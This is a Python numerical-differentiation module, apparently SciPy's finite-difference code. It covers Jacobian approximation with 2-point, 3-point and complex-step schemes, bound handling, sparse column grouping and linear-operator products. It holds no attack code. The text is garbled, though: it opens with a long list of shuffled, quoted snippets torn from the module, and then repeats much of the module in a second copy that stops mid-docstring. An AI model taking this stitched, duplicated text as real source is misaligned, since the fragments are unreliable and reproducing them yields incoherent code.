If", "a shape (m, 1). Our motivation is the following: a)", "use_one_sided = _adjust_scheme_to_bounds( x0, h, 1, '2-sided', lb, ub) elif", "used for points near the boundary. Both schemes have the", "* groups : array_like of shape (n,). A column grouping", "implementation is correct. See Also -------- approx_derivative : Compute finite", "x0, args=(1, 2)) array([[ 1., 0.], [-1., 0.]]) Bounds can", "structure, for ndarrays, if m=1 it is returned as a", "2*h / norm(p) x1 = x0 - (dx/2)*p x2 =", "enumeration. If int or None, a random permutation is used", "f0, rel_step, method) else: h = _compute_absolute_step(rel_step, x0, method) if", "x0) if lb.shape != x0.shape or ub.shape != x0.shape: raise", "to group columns. order : int, iterable of int with", "Otherwise it returns a dense array or sparse matrix depending", "numpy as np >>> from scipy.optimize import check_derivative >>> >>>", "in each row, then it's possible to estimate its several", "ub = _prepare_bounds(bounds, x0) if lb.shape != x0.shape or ub.shape", "is to compute the fraction. We store i, j and", "approx_derivative(f, x0, args=(1, 2)) array([[ 1., 0.], [-1., 0.]]) Bounds", "checking is not implemented when `as_linear_operator` is True. sparsity :", "the range of function evaluation. Bounds checking is not implemented", "array or sparse matrix depending on how `sparsity` is defined.", "elif method == '3-point': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return", "h_vecs[i] dx = x2[i] - x1[i] f1 = fun(x1) f2", "sparse matrix of shape (m, n). A zero element means", "\"\"\"Routines for numerical differentiation.\"\"\" from __future__ import division import numpy", "check_derivative : Check correctness of a function computing derivatives. Notes", "ValueError(\"`order` has incorrect shape.\") A = A[:, order] if issparse(A):", "matrix called the Jacobian, where an element (i, j) is", "x0 + h_total violated = (x < lb) | (x", "limit the range of function evaluation. Bounds checking is not", "called to get 2-D Jacobian with correct dimensions. References ----------", "Notes. f0 : None or array_like, optional If not None", "or sparse matrix, shape (m, n) Matrix of which to", "x[1])], ... [np.cos(c2 * x[1]), -c2 * x[0] * np.sin(c2", "13 (1974), pp. 117-120. 
\"\"\" if issparse(A): A = csc_matrix(A)", "> 1: raise RuntimeError(\"`fun` return value has \" \"more than", "np.abs(h_total) <= np.maximum(lower_dist, upper_dist) h_adjusted[violated & fitting] *= -1 forward", "array_like of shape (m,) or a scalar. jac : callable", "import numpy as np from numpy.linalg import norm from scipy.sparse.linalg", "and `x0`.\") if as_linear_operator and not (np.all(np.isinf(lb)) and np.all(np.isinf(ub))): raise", "machine epsilon for float64 numbers, s=2 for '2-point' method and", "helpful only if n_groups is significantly less than n. References", "= -3.0 * f0 + 4 * f1 - f2", "h) scheme : {'1-sided', '2-sided'} Whether steps in one or", "is None then a ndarray with shape (m, n) is", "dtype=float) for b in bounds] if lb.ndim == 0: lb", "- f0 elif method == '3-point' and use_one_sided[i]: x1 =", "schemes have the second-order accuracy in terms of Taylor expansion.", "_compute_absolute_step(rel_step, x0, method): if rel_step is None: rel_step = relative_step[method]", "df[rows] = f2[rows] - f1[rows] elif method == 'cs': f1", "which ith column assigned. The procedure was helpful only if", "_adjust_scheme_to_bounds( x0, h, 1, '1-sided', lb, ub) elif method ==", "= np.resize(ub, x0.shape) return lb, ub def group_columns(A, order=0): \"\"\"Group", "col_indices)), shape=(m, n)) return csr_matrix(J) def check_derivative(fun, jac, x0, bounds=(-np.inf,", "A.indices, A.indptr) else: groups = group_dense(m, n, A) groups[order] =", "which to group columns. order : int, iterable of int", "procedure was helpful only if n_groups is significantly less than", "return h, use_one_sided h_total = h * num_steps h_adjusted =", "= x2[i] - x1[i] f1 = fun(x1) f2 = fun(x2)", "j, abs_err_data = find(abs_err) J_diff_data = np.asarray(J_diff[i, j]).ravel() return np.max(np.abs(abs_err_data)", "... [np.cos(c2 * x[1]), -c2 * x[0] * np.sin(c2 *", "the boundary. - 'cs' - use a complex-step finite difference", "a scalar, in the latter case the bound will be", "is returned with a shape (m, 1). Our motivation is", "for b in bounds] if lb.ndim == 0: lb =", "0: lb = np.resize(lb, x0.shape) if ub.ndim == 0: ub", "f0 + 4 * f1 - f2 elif method ==", "# Restore column indices in the full array. j =", "arrays and later construct coo_matrix. row_indices.append(i) col_indices.append(j) fractions.append(df[i] / dx[j])", "np.inf)) array([ 2.]) \"\"\" if method not in ['2-point', '3-point',", "= relative_step[method] sign_x0 = (x0 >= 0).astype(float) * 2 -", "`sparsity` is defined. If `sparsity` is None then a ndarray", "both directions are required. In other words '1-sided' applies to", "forward or backward scheme is used for points near the", "-lower_dist[backward] / num_steps elif scheme == '2-sided': central = (lower_dist", "shape (m, 1). Our motivation is the following: a) It", "fun(x1) f2 = fun(x2) df = -3.0 * f0 +", "h, 1, '2-sided', lb, ub) elif method == 'cs': use_one_sided", "== '2-point': x = x0 + h_vecs[i] dx = x[i]", "bound constraints.\") if as_linear_operator: if rel_step is None: rel_step =", "= x2[mask_1] - x0[mask_1] dx[mask_2] = x2[mask_2] - x1[mask_2] f1", "gradient computation (m=1) in a conventional way. b) It clearly", "rel_step = relative_step[method] return _linear_operator_difference(fun_wrapped, x0, f0, rel_step, method) else:", "match the size of `x0` or be a scalar, in", "scheme == '1-sided': x = x0 + h_total violated =", "sparsity structure, use `group_columns` to obtain it. A single array", "= fun(x2) df = -3.0 * f0 + 4 *", "we compute left and right derivative at point 1.0. 
relative_step = {"2-point": EPS**0.5,
                 "3-point": EPS**(1/3),
                 "cs": EPS**0.5}


def _compute_absolute_step(rel_step, x0, method):
    if rel_step is None:
        rel_step = relative_step[method]
    sign_x0 = (x0 >= 0).astype(float) * 2 - 1
    return rel_step * sign_x0 * np.maximum(1.0, np.abs(x0))


def _prepare_bounds(bounds, x0):
    lb, ub = [np.asarray(b, dtype=float) for b in bounds]
    if lb.ndim == 0:
        lb = np.resize(lb, x0.shape)

    if ub.ndim == 0:
        ub = np.resize(ub, x0.shape)

    return lb, ub
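
# Illustrative sketch (added for exposition; `_demo_step_selection` is a
# hypothetical helper, not part of the original module) of how the two
# private helpers above cooperate: `_compute_absolute_step` picks a signed
# step scaled by max(1, |x0|), and `_adjust_scheme_to_bounds` then flips or
# shrinks steps that would leave the feasible box.
def _demo_step_selection():
    x0 = np.array([-2.0, 0.95])
    lb = np.array([-np.inf, -1.0])
    ub = np.array([np.inf, 1.0])
    h = _compute_absolute_step(0.1, x0, '3-point')  # [-0.2, 0.1]
    # The second variable cannot take a full central step (0.95 + 0.1 > 1),
    # so it is switched to a one-sided scheme stepping away from the bound.
    h_adjusted, use_one_sided = _adjust_scheme_to_bounds(
        x0, h, 1, '2-sided', lb, ub)
    return h_adjusted, use_one_sided  # ([0.2, -0.1], [False, True])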
def group_columns(A, order=0):
    """Group columns of a 2-D matrix for sparse finite differencing [1]_.

    Two columns are in the same group if in each row at least one of them
    has zero. A greedy sequential algorithm is used to construct groups.

    Parameters
    ----------
    A : array_like or sparse matrix, shape (m, n)
        Matrix of which to group columns.
    order : int, iterable of int with shape (n,) or None
        Permutation array which defines the order of columns enumeration.
        If int or None, a random permutation is used with `order` used as
        a random seed. Default is 0, that is, use a random permutation but
        guarantee repeatability.

    Returns
    -------
    groups : ndarray of int, shape (n,)
        Contains values from 0 to n_groups-1, where n_groups is the number
        of found groups. Each value ``groups[i]`` is an index of the group
        to which the ith column is assigned. The procedure is helpful only
        if n_groups is significantly less than n.

    References
    ----------
    .. [1] <NAME>, <NAME>, and <NAME>, "On the estimation of sparse
           Jacobian matrices", Journal of the Institute of Mathematics and
           its Applications, 13 (1974), pp. 117-120.
    """
    if issparse(A):
        A = csc_matrix(A)
    else:
        A = np.atleast_2d(A)
        A = (A != 0).astype(np.int32)

    if A.ndim != 2:
        raise ValueError("`A` must be 2-dimensional.")

    m, n = A.shape

    if order is None or np.isscalar(order):
        rng = np.random.RandomState(order)
        order = rng.permutation(n)
    else:
        order = np.asarray(order)
        if order.shape != (n,):
            raise ValueError("`order` has incorrect shape.")

    A = A[:, order]

    if issparse(A):
        groups = group_sparse(m, n, A.indices, A.indptr)
    else:
        groups = group_dense(m, n, A)

    groups[order] = groups.copy()

    return groups
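
# Usage sketch (added for exposition; `_demo_group_columns` is a
# hypothetical helper, not part of the original module). For a tridiagonal
# sparsity pattern, columns at distance >= 3 never share a row with
# non-zeros in both, so they can be perturbed simultaneously and a few
# groups suffice.
def _demo_group_columns():
    n = 6
    structure = (np.eye(n, dtype=int)
                 + np.eye(n, k=1, dtype=int)
                 + np.eye(n, k=-1, dtype=int))
    groups = group_columns(structure)
    # n_groups = np.max(groups) + 1 stays small (3 is achievable for this
    # pattern), whereas dense differencing would need n evaluations.
    return groups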
def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None,
                      bounds=(-np.inf, np.inf), sparsity=None,
                      as_linear_operator=False, args=(), kwargs={}):
    """Compute finite difference approximation of the derivatives of a
    vector-valued function.

    If a function maps from R^n to R^m, its derivatives form an m-by-n
    matrix called the Jacobian, where an element (i, j) is a partial
    derivative of f[i] with respect to x[j].

    Parameters
    ----------
    fun : callable
        Function of which to estimate the derivatives. The argument x
        passed to this function is an ndarray of shape (n,) (never a scalar
        even if n=1). It must return a 1-D array_like of shape (m,) or a
        scalar.
    x0 : array_like of shape (n,) or float
        Point at which to estimate the derivatives. Float will be converted
        to a 1-D array.
    method : {'3-point', '2-point', 'cs'}, optional
        Finite difference method to use:
            - '2-point' - use the first order accuracy forward or backward
                          difference.
            - '3-point' - use central difference in interior points and the
                          second order accuracy forward or backward
                          difference near the boundary.
            - 'cs' - use a complex-step finite difference scheme. This
                     assumes that the user function is real-valued and can
                     be analytically continued to the complex plane.
                     Otherwise, produces bogus results.
    rel_step : None or array_like, optional
        Relative step size to use. The absolute step size is computed as
        ``h = rel_step * sign(x0) * max(1, abs(x0))``, possibly adjusted to
        fit into the bounds. For ``method='3-point'`` the sign of `h` is
        ignored. If None (default) then the step is selected automatically,
        see Notes.
    f0 : None or array_like, optional
        If not None it is assumed to be equal to ``fun(x0)``, in which case
        ``fun(x0)`` is not called. Default is None.
    bounds : tuple of array_like, optional
        Lower and upper bounds on independent variables. Defaults to no
        bounds. Each bound must match the size of `x0` or be a scalar, in
        the latter case the bound will be the same for all variables. Use
        it to limit the range of function evaluation. Bounds checking is
        not implemented when `as_linear_operator` is True.
    sparsity : {None, array_like, sparse matrix, 2-tuple}, optional
        Defines a sparsity structure of the Jacobian matrix. If the
        Jacobian matrix is known to have only few non-zero elements in each
        row, then it's possible to estimate its several columns by a single
        function evaluation [3]_. To perform such economic computations two
        ingredients are required:

        * structure : array_like or sparse matrix of shape (m, n). A zero
          element means that a corresponding element of the Jacobian
          identically equals to zero.
        * groups : array_like of shape (n,). A column grouping for a given
          sparsity structure, use `group_columns` to obtain it.

        A single array or a sparse matrix is interpreted as a sparsity
        structure, and groups are computed inside the function. A tuple is
        interpreted as (structure, groups). If None (default), a standard
        dense differencing will be used.

        Note that sparse differencing makes sense only for large Jacobian
        matrices where each row contains few non-zero elements.
    as_linear_operator : bool, optional
        When True the function returns an
        `scipy.sparse.linalg.LinearOperator`. Otherwise it returns a dense
        array or a sparse matrix depending on `sparsity`. The linear
        operator provides an efficient way of computing ``J.dot(p)`` for
        any vector ``p`` of shape (n,), but does not allow direct access to
        individual elements of the matrix. By default `as_linear_operator`
        is False.
    args, kwargs : tuple and dict, optional
        Additional arguments passed to `fun`. Both empty by default.
        The calling signature is ``fun(x, *args, **kwargs)``.

    Returns
    -------
    J : {ndarray, sparse matrix, LinearOperator}
        Finite difference approximation of the Jacobian matrix.
        If `as_linear_operator` is True returns a LinearOperator with shape
        (m, n). Otherwise it returns a dense array or sparse matrix
        depending on how `sparsity` is defined. If `sparsity` is None then
        an ndarray with shape (m, n) is returned. If `sparsity` is not None
        returns a csr_matrix with shape (m, n). For sparse matrices and
        linear operators it is always returned as a 2-D structure; for
        ndarrays, if m=1 it is returned as a 1-D gradient array with shape
        (n,).

    See Also
    --------
    check_derivative : Check correctness of a function computing
        derivatives.

    Notes
    -----
    If `rel_step` is not provided, it is assigned to ``EPS**(1/s)``, where
    EPS is machine epsilon for float64 numbers, s=2 for '2-point' method
    and s=3 for '3-point' method. Such a relative step approximately
    minimizes a sum of truncation and round-off errors, see [1]_.

    A finite difference scheme for '3-point' method is selected
    automatically. The well-known central difference scheme is used for
    points sufficiently far from the boundary, and a 3-point forward or
    backward scheme is used for points near the boundary. Both schemes have
    second-order accuracy in terms of Taylor expansion. Refer to [2]_ for
    the formulas of 3-point forward and backward difference schemes.

    For dense differencing when m=1 the Jacobian is returned with a shape
    (n,); on the other hand when n=1 the Jacobian is returned with a shape
    (m, 1). Our motivation is the following: a) It handles a case of
    gradient computation (m=1) in a conventional way. b) It clearly
    separates these two different cases. c) In all cases np.atleast_2d can
    be called to get a 2-D Jacobian with correct dimensions.

    References
    ----------
    .. [1] W. H. Press et al. "Numerical Recipes. The Art of Scientific
           Computing. 3rd edition", sec. 5.7.

    .. [2] <NAME>, <NAME>, and <NAME>, "On the estimation of sparse
           Jacobian matrices", Journal of the Institute of Mathematics and
           its Applications, 13 (1974), pp. 117-120.

    .. [3] <NAME>, "Generation of Finite Difference Formulas on Arbitrarily
           Spaced Grids", Mathematics of Computation 51, 1988.

    Examples
    --------
    >>> import numpy as np
    >>> from scipy.optimize import approx_derivative
    >>>
    >>> def f(x, c1, c2):
    ...     return np.array([x[0] * np.sin(c1 * x[1]),
    ...                      x[0] * np.cos(c2 * x[1])])
    ...
    >>> x0 = np.array([1.0, 0.5 * np.pi])
    >>> approx_derivative(f, x0, args=(1, 2))
    array([[ 1.,  0.],
           [-1.,  0.]])

    Bounds can be used to limit the region of function evaluation.
    In the example below we compute left and right derivative at point 1.0.

    >>> def g(x):
    ...     return x**2 if x >= 1 else x
    ...
    >>> x0 = 1.0
    >>> approx_derivative(g, x0, bounds=(-np.inf, 1.0))
    array([ 1.])
    >>> approx_derivative(g, x0, bounds=(1.0, np.inf))
    array([ 2.])
    """
    if method not in ['2-point', '3-point', 'cs']:
        raise ValueError("Unknown method '%s'. " % method)

    x0 = np.atleast_1d(x0)
    if x0.ndim > 1:
        raise ValueError("`x0` must have at most 1 dimension.")

    lb, ub = _prepare_bounds(bounds, x0)

    if lb.shape != x0.shape or ub.shape != x0.shape:
        raise ValueError("Inconsistent shapes between bounds and `x0`.")

    if as_linear_operator and not (np.all(np.isinf(lb))
                                   and np.all(np.isinf(ub))):
        raise ValueError("Bounds not supported when "
                         "`as_linear_operator` is True.")

    def fun_wrapped(x):
        f = np.atleast_1d(fun(x, *args, **kwargs))
        if f.ndim > 1:
            raise RuntimeError("`fun` return value has "
                               "more than 1 dimension.")
        return f

    if f0 is None:
        f0 = fun_wrapped(x0)
    else:
        f0 = np.atleast_1d(f0)
        if f0.ndim > 1:
            raise ValueError("`f0` passed has more than 1 dimension.")

    if np.any((x0 < lb) | (x0 > ub)):
        raise ValueError("`x0` violates bound constraints.")

    if as_linear_operator:
        if rel_step is None:
            rel_step = relative_step[method]

        return _linear_operator_difference(fun_wrapped, x0,
                                           f0, rel_step, method)
    else:
        h = _compute_absolute_step(rel_step, x0, method)

        if method == '2-point':
            h, use_one_sided = _adjust_scheme_to_bounds(
                x0, h, 1, '1-sided', lb, ub)
        elif method == '3-point':
            h, use_one_sided = _adjust_scheme_to_bounds(
                x0, h, 1, '2-sided', lb, ub)
        elif method == 'cs':
            use_one_sided = False

        if sparsity is None:
            return _dense_difference(fun_wrapped, x0, f0, h,
                                     use_one_sided, method)
        else:
            if not issparse(sparsity) and len(sparsity) == 2:
                structure, groups = sparsity
            else:
                structure = sparsity
                groups = group_columns(sparsity)

            if issparse(structure):
                structure = csc_matrix(structure)
            else:
                structure = np.atleast_2d(structure)

            groups = np.atleast_1d(groups)
            return _sparse_difference(fun_wrapped, x0, f0, h,
                                      use_one_sided, structure,
                                      groups, method)
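
# Usage sketch (added for exposition; `_demo_sparse_jacobian` is a
# hypothetical helper, not part of the original module): estimating a
# banded Jacobian with few function evaluations by passing
# ``sparsity=(structure, groups)``.
def _demo_sparse_jacobian():
    n = 100

    def fun(x):
        # f[i] depends only on x[i] and x[i + 1]: a bidiagonal Jacobian.
        return x ** 2 + np.append(x[1:], 0.0)

    x0 = np.linspace(0.1, 1.0, n)
    structure = np.zeros((n, n), dtype=int)
    idx = np.arange(n)
    structure[idx, idx] = 1
    structure[idx[:-1], idx[:-1] + 1] = 1
    groups = group_columns(structure)
    # Each scheme side costs one evaluation per group instead of one per
    # column, so the whole Jacobian is recovered in a handful of calls.
    J = approx_derivative(fun, x0, sparsity=(structure, groups))
    return J  # csr_matrix of shape (n, n)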
def _linear_operator_difference(fun, x0, f0, h, method):
    m = f0.size
    n = x0.size

    if method == '2-point':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = h / norm(p)
            x = x0 + dx*p
            df = fun(x) - f0
            return df / dx

    elif method == '3-point':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = 2*h / norm(p)
            x1 = x0 - (dx/2)*p
            x2 = x0 + (dx/2)*p
            f1 = fun(x1)
            f2 = fun(x2)
            df = f2 - f1
            return df / dx

    elif method == 'cs':
        def matvec(p):
            if np.array_equal(p, np.zeros_like(p)):
                return np.zeros(m)
            dx = h / norm(p)
            x = x0 + dx*p*1.j
            f1 = fun(x)
            df = f1.imag
            return df / dx

    else:
        raise RuntimeError("Never be here.")

    return LinearOperator((m, n), matvec)
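
# Usage sketch (added for exposition; `_demo_linear_operator` is a
# hypothetical helper, not part of the original module): with
# ``as_linear_operator=True`` the Jacobian is never formed explicitly;
# each ``J.dot(p)`` costs only a couple of extra function evaluations.
def _demo_linear_operator():
    def fun(x):
        return np.array([x[0] ** 2 + x[1], np.sin(x[0])])

    x0 = np.array([1.0, 2.0])
    J = approx_derivative(fun, x0, method='2-point',
                          as_linear_operator=True)
    p = np.array([1.0, -1.0])
    # Directional derivative of fun at x0 along p; analytically
    # [2*1 - 1, cos(1)] = [1.0, 0.5403...].
    return J.dot(p)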
def _dense_difference(fun, x0, f0, h, use_one_sided, method):
    m = f0.size
    n = x0.size
    J_transposed = np.empty((n, m))
    h_vecs = np.diag(h)

    for i in range(h.size):
        if method == '2-point':
            x = x0 + h_vecs[i]
            dx = x[i] - x0[i]  # Recompute dx as exactly representable number.
            df = fun(x) - f0
        elif method == '3-point' and use_one_sided[i]:
            x1 = x0 + h_vecs[i]
            x2 = x0 + 2 * h_vecs[i]
            dx = x2[i] - x0[i]
            f1 = fun(x1)
            f2 = fun(x2)
            df = -3.0 * f0 + 4 * f1 - f2
        elif method == '3-point' and not use_one_sided[i]:
            x1 = x0 - h_vecs[i]
            x2 = x0 + h_vecs[i]
            dx = x2[i] - x1[i]
            f1 = fun(x1)
            f2 = fun(x2)
            df = f2 - f1
        elif method == 'cs':
            f1 = fun(x0 + h_vecs[i]*1.j)
            df = f1.imag
            dx = h_vecs[i, i]
        else:
            raise RuntimeError("Never be here.")

        J_transposed[i] = df / dx

    if m == 1:
        J_transposed = np.ravel(J_transposed)

    return J_transposed.T
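
# Illustrative sketch (added for exposition; `_demo_method_accuracy` is a
# hypothetical helper, not part of the original module): '3-point'
# differences are second-order accurate, so for a smooth function they are
# typically several digits closer to the true derivative than '2-point'.
def _demo_method_accuracy():
    def fun(x):
        return np.array([np.exp(x[0])])

    x0 = np.array([1.0])
    true = np.exp(1.0)
    err_2p = abs(approx_derivative(fun, x0, method='2-point')[0] - true)
    err_3p = abs(approx_derivative(fun, x0, method='3-point')[0] - true)
    return err_2p, err_3p  # expect err_3p << err_2p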
def _sparse_difference(fun, x0, f0, h, use_one_sided,
                       structure, groups, method):
    m = f0.size
    n = x0.size
    row_indices = []
    col_indices = []
    fractions = []

    n_groups = np.max(groups) + 1
    for group in range(n_groups):
        # Perturb variables which are in the same group simultaneously.
        e = np.equal(group, groups)
        h_vec = h * e
        if method == '2-point':
            x = x0 + h_vec
            dx = x - x0
            df = fun(x) - f0
            # The result is written to columns which correspond to
            # perturbed variables.
            cols, = np.nonzero(e)
            # Find all non-zero elements in selected columns of Jacobian.
            i, j, _ = find(structure[:, cols])
            # Restore column indices in the full array.
            j = cols[j]
        elif method == '3-point':
            # Here we do conceptually the same but separate one-sided
            # and two-sided schemes.
            x1 = x0.copy()
            x2 = x0.copy()

            mask_1 = use_one_sided & e
            x1[mask_1] += h_vec[mask_1]
            x2[mask_1] += 2 * h_vec[mask_1]

            mask_2 = ~use_one_sided & e
            x1[mask_2] -= h_vec[mask_2]
            x2[mask_2] += h_vec[mask_2]

            dx = np.zeros(n)
            dx[mask_1] = x2[mask_1] - x0[mask_1]
            dx[mask_2] = x2[mask_2] - x1[mask_2]

            f1 = fun(x1)
            f2 = fun(x2)

            cols, = np.nonzero(e)
            i, j, _ = find(structure[:, cols])
            j = cols[j]

            mask = use_one_sided[j]
            df = np.empty(m)

            rows = i[mask]
            df[rows] = -3 * f0[rows] + 4 * f1[rows] - f2[rows]

            rows = i[~mask]
            df[rows] = f2[rows] - f1[rows]
        elif method == 'cs':
            f1 = fun(x0 + h_vec*1.j)
            df = f1.imag
            dx = h_vec
            cols, = np.nonzero(e)
            i, j, _ = find(structure[:, cols])
            j = cols[j]
        else:
            raise ValueError("Never be here.")

        # All that's left is to compute the fraction. We store i, j and
        # fractions as separate arrays and later construct a coo_matrix.
        row_indices.append(i)
        col_indices.append(j)
        fractions.append(df[i] / dx[j])

    row_indices = np.hstack(row_indices)
    col_indices = np.hstack(col_indices)
    fractions = np.hstack(fractions)
    J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n))
    return csr_matrix(J)
"""Routines for numerical differentiation."""
from __future__ import division

import numpy as np
from numpy.linalg import norm

from scipy.sparse.linalg import LinearOperator
from ..sparse import issparse, csc_matrix, csr_matrix, coo_matrix, find
from ._group_columns import group_dense, group_sparse

EPS = np.finfo(np.float64).eps


def _adjust_scheme_to_bounds(x0, h, num_steps, scheme, lb, ub):
    """Adjust final difference scheme to the presence of bounds.

    Parameters
    ----------
    x0 : ndarray, shape (n,)
        Point at which we wish to estimate derivative.
    h : ndarray, shape (n,)
        Desired finite difference steps.
    num_steps : int
        Number of `h` steps in one direction required to implement finite
        difference scheme. For example, 2 means that we need to evaluate
        f(x0 + 2 * h) or f(x0 - 2 * h).
    scheme : {'1-sided', '2-sided'}
        Whether steps in one or both directions are required. In other
        words '1-sided' applies to forward and backward schemes, '2-sided'
        applies to center schemes.
    lb : ndarray, shape (n,)
        Lower bounds on independent variables.
    ub : ndarray, shape (n,)
        Upper bounds on independent variables.

    Returns
    -------
    h_adjusted : ndarray, shape (n,)
        Adjusted step sizes. Step size decreases only if a sign flip or
        switching to one-sided scheme doesn't allow taking a full step.
    use_one_sided : ndarray of bool, shape (n,)
        Whether to switch to one-sided scheme. Informative only for
        ``scheme='2-sided'``.
    """
    if scheme == '1-sided':
        use_one_sided = np.ones_like(h, dtype=bool)
    elif scheme == '2-sided':
        h = np.abs(h)
        use_one_sided = np.zeros_like(h, dtype=bool)
    else:
        raise ValueError("`scheme` must be '1-sided' or '2-sided'.")

    if np.all((lb == -np.inf) & (ub == np.inf)):
        return h, use_one_sided

    h_total = h * num_steps
    h_adjusted = h.copy()

    lower_dist = x0 - lb
    upper_dist = ub - x0

    if scheme == '1-sided':
        x = x0 + h_total
        violated = (x < lb) | (x > ub)
        fitting = np.abs(h_total) <= np.maximum(lower_dist, upper_dist)
        h_adjusted[violated & fitting] *= -1

        forward = (upper_dist >= lower_dist) & ~fitting
        h_adjusted[forward] = upper_dist[forward] / num_steps
        backward = (upper_dist < lower_dist) & ~fitting
        h_adjusted[backward] = -lower_dist[backward] / num_steps
    elif scheme == '2-sided':
        central = (lower_dist >= h_total) & (upper_dist >= h_total)

        forward = (upper_dist >= lower_dist) & ~central
        h_adjusted[forward] = np.minimum(
            h[forward], 0.5 * upper_dist[forward] / num_steps)
        use_one_sided[forward] = True

        backward = (upper_dist < lower_dist) & ~central
        h_adjusted[backward] = -np.minimum(
            h[backward], 0.5 * lower_dist[backward] / num_steps)
        use_one_sided[backward] = True

        min_dist = np.minimum(upper_dist, lower_dist) / num_steps
        adjusted_central = (~central & (np.abs(h_adjusted) <= min_dist))
        h_adjusted[adjusted_central] = min_dist[adjusted_central]
        use_one_sided[adjusted_central] = False

    return h_adjusted, use_one_sided


relative_step = {"2-point": EPS**0.5,
                 "3-point": EPS**(1/3),
                 "cs": EPS**0.5}


def _compute_absolute_step(rel_step, x0, method):
    if rel_step is None:
        rel_step = relative_step[method]
    sign_x0 = (x0 >= 0).astype(float) * 2 - 1
    return rel_step * sign_x0 * np.maximum(1.0, np.abs(x0))


def _prepare_bounds(bounds, x0):
    lb, ub = [np.asarray(b, dtype=float) for b in bounds]
    if lb.ndim == 0:
        lb = np.resize(lb, x0.shape)

    if ub.ndim == 0:
        ub = np.resize(ub, x0.shape)

    return lb, ub
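
# --- Editorial example (not part of the original module) ---
# A minimal sketch of how the default absolute step behaves: it is the
# relative step EPS**(1/s) scaled by max(1, |x0|) componentwise, so large
# components get proportionally larger steps while tiny components are
# protected by the floor of 1. The `_demo_*` helper name is hypothetical;
# the function is never called on import, run it manually to inspect it.
def _demo_absolute_step():
    x0 = np.array([1e-8, 1.0, 1e8])
    # With rel_step=None and '2-point', rel_step defaults to EPS**0.5,
    # roughly 1.49e-8, so this prints about [1.49e-08, 1.49e-08, 1.49e+00].
    print(_compute_absolute_step(None, x0, '2-point'))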

def group_columns(A, order=0):
    """Group columns of a 2-D matrix for sparse finite differencing [1]_.

    Two columns are in the same group if in each row at least one of them
    has zero. A greedy sequential algorithm is used to construct groups.

    Parameters
    ----------
    A : array_like or sparse matrix, shape (m, n)
        Matrix of which to group columns.
    order : int, iterable of int with shape (n,) or None
        Permutation array which defines the order of columns enumeration.
        If int or None, a random permutation is used with `order` used as
        a random seed. Default is 0, that is use a random permutation but
        guarantee repeatability.

    Returns
    -------
    groups : ndarray of int, shape (n,)
        Contains values from 0 to n_groups-1, where n_groups is the number
        of found groups. Each value ``groups[i]`` is an index of a group to
        which the ith column is assigned. The grouping is helpful only if
        n_groups is significantly less than n.

    References
    ----------
    .. [1] <NAME>, <NAME>, and <NAME>, "On the estimation of sparse
           Jacobian matrices", Journal of the Institute of Mathematics
           and its Applications, 13 (1974), pp. 117-120.
    """
    if issparse(A):
        A = csc_matrix(A)
    else:
        A = np.atleast_2d(A)
        A = (A != 0).astype(np.int32)

    if A.ndim != 2:
        raise ValueError("`A` must be 2-dimensional.")

    m, n = A.shape

    if order is None or np.isscalar(order):
        rng = np.random.RandomState(order)
        order = rng.permutation(n)
    else:
        order = np.asarray(order)
        if order.shape != (n,):
            raise ValueError("`order` has incorrect shape.")

    A = A[:, order]

    if issparse(A):
        groups = group_sparse(m, n, A.indices, A.indptr)
    else:
        groups = group_dense(m, n, A)

    groups[order] = groups.copy()

    return groups
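
# --- Editorial example (not part of the original module) ---
# A minimal sketch of column grouping on a tridiagonal sparsity pattern:
# columns more than two positions apart never share a non-zero row, so
# they can be perturbed together and the number of groups stays small no
# matter how large n gets. The helper name is hypothetical, and the exact
# group labels depend on the seeded random permutation used internally.
def _demo_group_columns():
    structure = np.eye(6) + np.eye(6, k=1) + np.eye(6, k=-1)
    groups = group_columns(structure)
    print(groups)              # one small integer label per column
    print(np.max(groups) + 1)  # typically 3 or 4 groups, versus n = 6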

def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None,
                      bounds=(-np.inf, np.inf), sparsity=None,
                      as_linear_operator=False, args=(), kwargs={}):
    """Compute finite difference approximation of the derivatives of a
    vector-valued function.

    If a function maps from R^n to R^m, its derivatives form m-by-n matrix
    called the Jacobian, where an element (i, j) is a partial derivative of
    f[i] with respect to x[j].

    Parameters
    ----------
    fun : callable
        Function of which to estimate the derivatives. The argument x
        passed to this function is ndarray of shape (n,) (never a scalar
        even if n=1). It must return 1-D array_like of shape (m,) or a
        scalar.
    x0 : array_like of shape (n,) or float
        Point at which to estimate the derivatives. Float will be converted
        to a 1-D array.
    method : {'3-point', '2-point', 'cs'}, optional
        Finite difference method to use:
            - '2-point' - use the first order accuracy forward or backward
                          difference.
            - '3-point' - use central difference in interior points and the
                          second order accuracy forward or backward
                          difference near the boundary.
            - 'cs' - use a complex-step finite difference scheme. This
                     assumes that the user function is real-valued and can
                     be analytically continued to the complex plane.
                     Otherwise, produces bogus results.
    rel_step : None or array_like, optional
        Relative step size to use. The absolute step size is computed as
        ``h = rel_step * sign(x0) * max(1, abs(x0))``, possibly adjusted to
        fit into the bounds. For ``method='3-point'`` the sign of `h` is
        ignored. If None (default) then step is selected automatically,
        see Notes.
    f0 : None or array_like, optional
        If not None it is assumed to be equal to ``fun(x0)``, in this case
        the ``fun(x0)`` is not called. Default is None.
    bounds : tuple of array_like, optional
        Lower and upper bounds on independent variables. Defaults to no
        bounds. Each bound must match the size of `x0` or be a scalar, in
        the latter case the bound will be the same for all variables.
        Use it to limit the range of function evaluation. Bounds checking
        is not implemented when `as_linear_operator` is True.
    sparsity : {None, array_like, sparse matrix, 2-tuple}, optional
        Defines a sparsity structure of the Jacobian matrix. If the
        Jacobian matrix is known to have only few non-zero elements in
        each row, then it's possible to estimate its several columns by a
        single function evaluation [3]_. To perform such economic
        computations two ingredients are required:

        * structure : array_like or sparse matrix of shape (m, n). A zero
          element means that a corresponding element of the Jacobian
          identically equals to zero.
        * groups : array_like of shape (n,). A column grouping for a given
          sparsity structure, use `group_columns` to obtain it.

        A single array or a sparse matrix is interpreted as a sparsity
        structure, and groups are computed inside the function. A tuple is
        interpreted as (structure, groups). If None (default), a standard
        dense differencing will be used.

        Note that sparse differencing makes sense only for large Jacobian
        matrices where each row contains few non-zero elements.
    as_linear_operator : bool, optional
        When True the function returns an
        `scipy.sparse.linalg.LinearOperator`. Otherwise it returns a dense
        array or a sparse matrix depending on `sparsity`. The linear
